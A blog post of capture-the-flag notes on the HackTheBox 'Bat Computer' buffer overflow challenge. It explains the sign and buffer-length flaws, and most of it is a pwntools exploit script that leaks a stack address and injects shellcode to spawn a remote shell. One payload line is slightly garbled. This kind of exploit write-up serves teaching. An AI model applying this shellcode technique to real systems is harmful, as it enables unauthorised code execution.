We covered a scenario of buffer overflow where a variable was declared as an unsigned integer and then casted to the function ulong. This let us send ‘-1’ as an input to this variable which redirected the program execution flow into an if statement that contained a snippet where a name variable with 96 bytes accepts an unrestricted input from the user which resulted in segmentation fault. We calculated the offset using pwndbg with python and created the final exploit.This was part of HackTheBox Bat Computer | Intro to binary exploitation

Buffer Overflow Techniques Notes

Exploit Code is below

##Beginning

from pwn import *

context.binary = ELF(‘./batcomputer’)

con = remote(‘157.245.39.76’,31662)

con.sendline(‘1’)

con.recvuntil(‘0x’)

stack_base = int((“0x”+con.recv().decode(‘latin-1’).split()[0]),16)

log.success(f‘stack base: {hex(stack_base)})

con.sendline(‘2’)

con.sendline(‘b4tp@$$w0rd!’)

payload = asm(shellcraft.popad() + shellcraft.sh()) # shellcode

payload += b‘A’*(84 len(payload)) # nop

payload += p64(stack_base) # stack base

con.sendline(payload)

con.sendline(‘3’)

con.interactive()

##Ending

Video Walkthrough

, , , , ,
Show Comments

Motasem

About the Author

I create cybersecurity notes, digital marketing notes and online courses. I also provide digital marketing consulting including but not limited to SEO, Google & Meta ads and CRM administration.

View Articles